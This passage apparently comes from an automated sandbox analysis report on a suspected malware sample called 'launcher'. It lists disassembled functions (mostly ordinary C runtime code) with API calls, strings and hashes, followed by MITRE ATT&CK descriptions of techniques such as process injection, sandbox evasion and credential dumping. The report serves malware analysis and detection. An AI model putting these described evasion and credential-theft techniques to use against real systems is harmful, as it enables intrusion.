Instruction Fuzzy Hash: DA21DE31204215AFCB20AF798CC192A7BE9FF40364B904594F85597252EB30EE40F7A0

Function 00B531BE Relevance: 6.1, APIs: 4, Instructions: 74COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32 ref: 00B531C6

Part of subcall function 00B4C021: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,00B4D895,?,00000000,-00000008), ref: 00B4C082

FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00B531FE
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00B5321E

Memory Dump Source

Source File: 00000003.00000002.3279397950.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000003.00000002.3279379524.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3279426207.0000000000B5D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3279447103.0000000000B6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3279467312.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3279486285.0000000000B72000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3279521351.0000000000BBC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b30000_launcher.jbxd

Similarity

API ID: EnvironmentStrings$Free$ByteCharMultiWide
String ID:
API String ID: 158306478-0
Opcode ID: 7334a26d0257302a70cc1c99beeeec771ebc2ac4f777808cb12c3a753ec05613
Instruction ID: d6f4692f3b6e93784c86a3bc750294778e4b74ed2bfcd6238d6fa85bd22bfcf8
Opcode Fuzzy Hash: 7334a26d0257302a70cc1c99beeeec771ebc2ac4f777808cb12c3a753ec05613
Instruction Fuzzy Hash: 1311EDB15019157EA7222BB15C8ADBF6EDCDE85BD6B1004E8FA05D2200FFA5DF0491B1

Function 00B3E892 Relevance: 6.1, APIs: 4, Instructions: 60COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00B3E899
std::_Lockit::_Lockit.LIBCPMT ref: 00B3E8A3
int.LIBCPMT ref: 00B3E8BA

Part of subcall function 00B3C1E5: std::_Lockit::_Lockit.LIBCPMT ref: 00B3C1F6
Part of subcall function 00B3C1E5: std::_Lockit::~_Lockit.LIBCPMT ref: 00B3C210

std::_Lockit::~_Lockit.LIBCPMT ref: 00B3E914

Memory Dump Source

Source File: 00000003.00000002.3279397950.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000003.00000002.3279379524.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3279426207.0000000000B5D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3279447103.0000000000B6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3279467312.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3279486285.0000000000B72000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3279521351.0000000000BBC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b30000_launcher.jbxd

Similarity

API ID: Lockitstd::_$Lockit::_Lockit::~_$H_prolog3
String ID:
API String ID: 1383202999-0
Opcode ID: 4e7dc1f210dc3e731d7bdc8b2476a01b11140a6065b41af14a2b55fbdfde8b59
Instruction ID: 301d6b4a4b1309ae4d3be6dd1d4506b73955da91f1235412f6f10ee8e40d3944
Opcode Fuzzy Hash: 4e7dc1f210dc3e731d7bdc8b2476a01b11140a6065b41af14a2b55fbdfde8b59
Instruction Fuzzy Hash: D211A132904119DBCB05EBA4C955ABEBBF1AF84710F35019AF461BB2D1DF749E00CB91

Function 00B5ADA0 Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE

Download Yara Rule

APIs

WriteConsoleW.KERNEL32(00000000,?,00000000,00000000,00000000,?,00B5A2EF,00000000,00000001,00000000,?,?,00B54390,?,00000000,00000000), ref: 00B5ADB7
GetLastError.KERNEL32(?,00B5A2EF,00000000,00000001,00000000,?,?,00B54390,?,00000000,00000000,?,?,?,00B53CD6,00000000), ref: 00B5ADC3

Part of subcall function 00B5AE20: CloseHandle.KERNEL32(FFFFFFFE,00B5ADD3,?,00B5A2EF,00000000,00000001,00000000,?,?,00B54390,?,00000000,00000000,?,?), ref: 00B5AE30

___initconout.LIBCMT ref: 00B5ADD3

Part of subcall function 00B5ADF5: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,00B5AD91,00B5A2DC,?,?,00B54390,?,00000000,00000000,?), ref: 00B5AE08

WriteConsoleW.KERNEL32(00000000,?,00000000,00000000,?,00B5A2EF,00000000,00000001,00000000,?,?,00B54390,?,00000000,00000000,?), ref: 00B5ADE8

Memory Dump Source

Source File: 00000003.00000002.3279397950.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000003.00000002.3279379524.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3279426207.0000000000B5D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3279447103.0000000000B6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3279467312.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3279486285.0000000000B72000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3279521351.0000000000BBC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b30000_launcher.jbxd

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
String ID:
API String ID: 2744216297-0
Opcode ID: 2192ac446389a65ca93842551c2afaaf4af978ceb837dc605430c76c5e382160
Instruction ID: f4f4f7d3bbd7b2bcbcef90bbe20e3dd18308ad2f46f0cd37d218526949bb1ef3
Opcode Fuzzy Hash: 2192ac446389a65ca93842551c2afaaf4af978ceb837dc605430c76c5e382160
Instruction Fuzzy Hash: 00F01C36500158BBCF222FD5DC08A9A3F76FF087A2B0041A1FE09961B0DB728860AB91

Function 00B404F5 Relevance: 6.0, APIs: 4, Instructions: 25timethreadCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32(?), ref: 00B40507
GetCurrentThreadId.KERNEL32 ref: 00B40516
GetCurrentProcessId.KERNEL32 ref: 00B4051F
QueryPerformanceCounter.KERNEL32(?), ref: 00B4052C

Memory Dump Source

Source File: 00000003.00000002.3279397950.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000003.00000002.3279379524.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3279426207.0000000000B5D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3279447103.0000000000B6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3279467312.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3279486285.0000000000B72000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3279521351.0000000000BBC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b30000_launcher.jbxd

Similarity

API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
String ID:
API String ID: 2933794660-0
Opcode ID: be1da974f7631c06359d8c8f9212dbaecb24967f03ae01222cb933568de9b7c4
Instruction ID: 58389d7596cbc6bbef06536e5103d0e7fb5a30221b00b6d111ad6bb361fe8d30
Opcode Fuzzy Hash: be1da974f7631c06359d8c8f9212dbaecb24967f03ae01222cb933568de9b7c4
Instruction Fuzzy Hash: ACF06274D1020DEBCB00DFB4DA4999EBBF4FF1C204B9149A5E412E7150EB74AB449F50

Function 00B50976 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 191COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00B4C16A: GetLastError.KERNEL32(00000000,?,00B4E58D), ref: 00B4C16E
Part of subcall function 00B4C16A: SetLastError.KERNEL32(00000000,?,?,00000028,00B48363), ref: 00B4C210

GetACP.KERNEL32(-00000002,00000000,?,00000000,00000000,?,00B45BD5,?,?,?,00000055,?,-00000050,?,?,?), ref: 00B50A35
IsValidCodePage.KERNEL32(00000000,-00000002,00000000,?,00000000,00000000,?,00B45BD5,?,?,?,00000055,?,-00000050,?,?), ref: 00B50A6C

Strings

utf8, xrefs: 00B50B3E

Memory Dump Source

Source File: 00000003.00000002.3279397950.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000003.00000002.3279379524.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3279426207.0000000000B5D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3279447103.0000000000B6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3279467312.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3279486285.0000000000B72000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3279521351.0000000000BBC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b30000_launcher.jbxd

Similarity

API ID: ErrorLast$CodePageValid
String ID: utf8
API String ID: 943130320-905460609
Opcode ID: ff734a21468eddf7517586cbb338f278ab2b8da242a459aebec696df4defb1f3
Instruction ID: 66911909d642b168bed6d71ec10d01a729b12c917c9a63586510f1c6b669468c
Opcode Fuzzy Hash: ff734a21468eddf7517586cbb338f278ab2b8da242a459aebec696df4defb1f3
Instruction Fuzzy Hash: 0051E431620705AAEB25BB758CC2FBA73E8EF05706F1404E9FD4597182FB70E94887A5

Function 0042C74D Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 159COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32 ref: 0042C871

Strings

q, xrefs: 0042C891
*!_, xrefs: 0042C882

Memory Dump Source

Source File: 00000003.00000002.3279306692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.3279306692.0000000000450000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_launcher.jbxd

Similarity

API ID: FreeLibrary
String ID: *!_$q
API String ID: 3664257935-1837099632
Opcode ID: 80fcb65e9b5badf3a92e4582dfa317bc7247576eba0737fa6569bc4b94d366ed
Instruction ID: ef44159ba1dec6f133731199ecb8dbbaf985983d643a77c5956dfe7a171fcdee
Opcode Fuzzy Hash: 80fcb65e9b5badf3a92e4582dfa317bc7247576eba0737fa6569bc4b94d366ed
Instruction Fuzzy Hash: E541897060C3819BE3118B25A85072BBFE1DFA2701F14441DF4C69B3D2DB394805879A

Function 00B373E0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 135COMMON

Download Yara Rule

APIs

Concurrency::details::_Release_chore.LIBCPMT ref: 00B37526
___std_exception_copy.LIBVCRUNTIME ref: 00B37561

Part of subcall function 00B3AF37: CreateThreadpoolWork.KERNEL32(00B3B060,00B38A2A,00000000), ref: 00B3AF46
Part of subcall function 00B3AF37: Concurrency::details::_Reschedule_chore.LIBCPMT ref: 00B3AF53

Strings

Fail to schedule the chore!, xrefs: 00B37551, 00B37560

Memory Dump Source

Source File: 00000003.00000002.3279397950.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000003.00000002.3279379524.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3279426207.0000000000B5D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3279447103.0000000000B6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3279467312.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3279486285.0000000000B72000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3279521351.0000000000BBC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b30000_launcher.jbxd

Similarity

API ID: Concurrency::details::_$CreateRelease_choreReschedule_choreThreadpoolWork___std_exception_copy
String ID: Fail to schedule the chore!
API String ID: 3683891980-3313369819
Opcode ID: d2a4519517eac662dfed852e82f50e45a058c3c1da79df1d26566779ac731487
Instruction ID: 78ea3ba3c207b2ba6a81e737ebbbef3fc07886734547e72088f33179f6ea0927
Opcode Fuzzy Hash: d2a4519517eac662dfed852e82f50e45a058c3c1da79df1d26566779ac731487
Instruction Fuzzy Hash: 5A518BB19012089FCB14DF54DC85BAEBBF0FF48314F2441A9E819AB391DB79AA05CF91

Function 00B4B992 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 120COMMONLIBRARYCODE

Download Yara Rule

APIs

EncodePointer.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,?,00B4B893,?,?,00000000,00000000,00000000,?), ref: 00B4B9B7

Strings

MOC, xrefs: 00B4B9C9
RCC, xrefs: 00B4B9D1

Memory Dump Source

Source File: 00000003.00000002.3279397950.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000003.00000002.3279379524.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3279426207.0000000000B5D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3279447103.0000000000B6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3279467312.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3279486285.0000000000B72000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3279521351.0000000000BBC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b30000_launcher.jbxd

Similarity

API ID: EncodePointer
String ID: MOC$RCC
API String ID: 2118026453-2084237596
Opcode ID: cda35064532dedf1ec86f53e19a1af1ae3f4f6f8631ba70644918e934bec7097
Instruction ID: 5e3d2d026ac12d91cae413dde183bb81abeb25cb62c130fcee0090aaa38e7eb7
Opcode Fuzzy Hash: cda35064532dedf1ec86f53e19a1af1ae3f4f6f8631ba70644918e934bec7097
Instruction Fuzzy Hash: 37413672900209AFCF15DF98CD81EAEBBB5FF48304F188199FA14A7212D735DA50EB51

Function 00B33E90 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 109COMMONLIBRARYCODE

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00B33EC6
std::_Lockit::~_Lockit.LIBCPMT ref: 00B34002

Part of subcall function 00B3ABC5: _Yarn.LIBCPMT ref: 00B3ABE5
Part of subcall function 00B3ABC5: _Yarn.LIBCPMT ref: 00B3AC09

Strings

bad locale name, xrefs: 00B33F46

Memory Dump Source

Source File: 00000003.00000002.3279397950.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000003.00000002.3279379524.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3279426207.0000000000B5D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3279447103.0000000000B6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3279467312.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3279486285.0000000000B72000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3279521351.0000000000BBC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b30000_launcher.jbxd

Similarity

API ID: LockitYarnstd::_$Lockit::_Lockit::~_
String ID: bad locale name
API String ID: 2070049627-1405518554
Opcode ID: 31e812815632a43c7ebb9dd8211a48c4f758cc79e57c4a252cb2a4368fedddd3
Instruction ID: f35398207772de0e36943f8e80fa2f2da73b732aba0921f1c6d4f87c4443581e
Opcode Fuzzy Hash: 31e812815632a43c7ebb9dd8211a48c4f758cc79e57c4a252cb2a4368fedddd3
Instruction Fuzzy Hash: 134191F1A007459BEB10DF69C805B17BBF8BF04B14F144268E44997780E3BAE618CBE1

Function 00B4B1FE Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 97COMMONLIBRARYCODE

Download Yara Rule

APIs

___except_validate_context_record.LIBVCRUNTIME ref: 00B4B475

Strings

csm, xrefs: 00B4B497
csm, xrefs: 00B4B508

Memory Dump Source

Source File: 00000003.00000002.3279397950.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000003.00000002.3279379524.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3279426207.0000000000B5D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3279447103.0000000000B6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3279467312.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3279486285.0000000000B72000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3279521351.0000000000BBC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b30000_launcher.jbxd

Similarity

API ID: ___except_validate_context_record
String ID: csm$csm
API String ID: 3493665558-3733052814
Opcode ID: 25c6f0ec11ec57a4cd6c467cefd98c6f06ba9bbc29b4db1bdfdfccafe55ec1b6
Instruction ID: 2eb667c629b1d6e05809b9d7a4c108c45fc240ed03f4794cd478b9ebf22263b7
Opcode Fuzzy Hash: 25c6f0ec11ec57a4cd6c467cefd98c6f06ba9bbc29b4db1bdfdfccafe55ec1b6
Instruction Fuzzy Hash: 4931E871400215EBCF268F54CC50DAABBE6FF18314B1445DAFA4449222C336DF61FB81

Function 00B3B831 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 73COMMON

Download Yara Rule

APIs

__alloca_probe_16.LIBCMT ref: 00B3B8B9
RaiseException.KERNEL32(?,?,?,?,?), ref: 00B3B8DE

Part of subcall function 00B4060C: RaiseException.KERNEL32(E06D7363,00000001,00000003,00B3F354,00000000,?,?,?,00B3F354,00B33D4A,00B6759C,00B33D4A), ref: 00B4066D

Part of subcall function 00B48353: IsProcessorFeaturePresent.KERNEL32(00000017,00B4378B,?,?,?,?,00000000,?,?,?,00B3B5AC,00B3B4E0,00000000,?,?,00B3B4E0), ref: 00B4836F

Strings

csm, xrefs: 00B3B86D

Memory Dump Source

Source File: 00000003.00000002.3279397950.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000003.00000002.3279379524.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3279426207.0000000000B5D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3279447103.0000000000B6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3279467312.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3279486285.0000000000B72000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3279521351.0000000000BBC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b30000_launcher.jbxd

Similarity

API ID: ExceptionRaise$FeaturePresentProcessor__alloca_probe_16
String ID: csm
API String ID: 1924019822-1018135373
Opcode ID: fe15e0a354f4ba5fbfb08327a51ef940e186cb57cc9a3c53ff26083f570afcc1
Instruction ID: 5297cc352b58e9f2361e72b6255014f16c181987a3832b7da644c05e2eb6da3c
Opcode Fuzzy Hash: fe15e0a354f4ba5fbfb08327a51ef940e186cb57cc9a3c53ff26083f570afcc1
Instruction Fuzzy Hash: 4F217C31D01218EBCF24DF99D845EEEB7F9EF44710F640499E606AB254CB70AE45CB91

Function 00B3B46C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 59COMMONLIBRARYCODE

Download Yara Rule

APIs

___std_exception_copy.LIBVCRUNTIME ref: 00B32673

Strings

bad array new length, xrefs: 00B32626
ios_base::badbit set, xrefs: 00B32650

Memory Dump Source

Source File: 00000003.00000002.3279397950.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000003.00000002.3279379524.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3279426207.0000000000B5D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3279447103.0000000000B6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3279467312.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3279486285.0000000000B72000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3279521351.0000000000BBC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b30000_launcher.jbxd

Similarity

API ID: ___std_exception_copy
String ID: bad array new length$ios_base::badbit set
API String ID: 2659868963-1158432155
Opcode ID: ebad119b3f56b276744a5badec469ce04c2c46a5188566ca8e22cce6fcfdbe2b
Instruction ID: 9ab065eda3250bab67ac37ff6b8e43875e10601cc13491fb4ed15c0441e35d26
Opcode Fuzzy Hash: ebad119b3f56b276744a5badec469ce04c2c46a5188566ca8e22cce6fcfdbe2b
Instruction Fuzzy Hash: AD01DFF2514700ABDB14EF28D856B1A7BE4EF08318F1189ACF959CB351D779E908CB85

Function 00B32610 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 41COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00B4060C: RaiseException.KERNEL32(E06D7363,00000001,00000003,00B3F354,00000000,?,?,?,00B3F354,00B33D4A,00B6759C,00B33D4A), ref: 00B4066D

___std_exception_copy.LIBVCRUNTIME ref: 00B32673

Strings

bad array new length, xrefs: 00B32626
ios_base::badbit set, xrefs: 00B32650

Memory Dump Source

Source File: 00000003.00000002.3279397950.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000003.00000002.3279379524.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3279426207.0000000000B5D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3279447103.0000000000B6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3279467312.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3279486285.0000000000B72000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3279521351.0000000000BBC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b30000_launcher.jbxd

Similarity

API ID: ExceptionRaise___std_exception_copy
String ID: bad array new length$ios_base::badbit set
API String ID: 3109751735-1158432155
Opcode ID: 185a6f902fbd0d8eae5e0b29558c3c8fb3191682c9aa0f3b888382817132e888
Instruction ID: 65aca883cbd1aa138a73624606891416577eceef3e3d0213b966000d4c5f9b72
Opcode Fuzzy Hash: 185a6f902fbd0d8eae5e0b29558c3c8fb3191682c9aa0f3b888382817132e888
Instruction Fuzzy Hash: CEF058F2914300ABE710AF18D806707BBE4EB08319F01899CFA999B340D3B9D448CB92

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
